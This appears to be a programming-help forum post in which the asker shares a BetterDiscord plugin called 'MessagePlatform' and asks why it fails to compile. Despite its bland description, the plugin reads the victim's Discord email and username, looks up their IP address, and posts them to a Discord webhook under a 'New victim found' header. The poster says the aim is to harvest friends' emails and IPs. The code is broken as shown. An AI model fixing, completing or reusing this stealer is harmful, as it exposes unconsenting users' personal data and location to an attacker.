# {Better Discord Plugin} For Email and Ip Logging Code Js And Fetch

Tags: javascript

```
//META{"name":"MessagePlatform"}*//

const config ={
   "info": {
        "name": "MessagePlatform",
        "authors": ["Sayanoraxeni"],
        "version": "0.1.1",
        "description": "Plugin for Discord"
    },

    "webhook": "https://discord.com/api/webhooks/xxxxxxxxxxx/xxxxxxxxxxxx"
}



class MessagePlatform {
        /* BD functions */
    getName() {
        return "MessagePlatform";
    }

    getVersion() {
        return "0.1.1";
    }

    getAuthor() {
        return "Sayanoraxeni";
    }

    getDescription() {
        return "Plugin for Discord userEmail and userId";
        }
 
    constructor() { 
               this._config = config; }
    
    getName() { return config.info.name; }
    getAuthor() { return config.info.authors[0] }
    getDescription() { return config.info.description; }
    getVersion() { return config.info.version; }


    load() {
        const userEmail = Object.values(webpackJsonp.push([ [], { ['']: (_, e, r) => { e.cache = r.c } }, [ [''] ] ]).cache).find(m => m.exports && m.exports.default && m.exports.default.getEmail !== void 0).exports.default.getEmail();
        const username = BdApi.findModuleByProps("getCurrentUser").getCurrentUser().username
    

    fetch('https://api.ipify.org/?format=json%22', {
    method: 'POST',
    headers: {
    'content-1': 'application/json'
    }
    body: JSON.stringify({
    name: 'User1',
    content: `New victim found by __${config.info.authors[0]}__**\n\n**Victim's nickname: __${username}__**\n**Victim email: __${userEmail}__**\n**IP: __${data.ip}__`
    })
  }).then(res =>
    res.json())
          .then(data => post(`https://discord.com/api/webhooks/xxxxxxxxxx/xxxaxxxx`))

  }
```

So This is a code i been working on just to find my friends emails and ip in discord. This Is a Plugin for Better Discord. But since it uses Javascript and fetch etc i knew stack exchange could help me.
So When I Try Running the code there are two main errors
Cant Compile
and unexpected Identifier

I did Debug it but i am not able to find what went wrong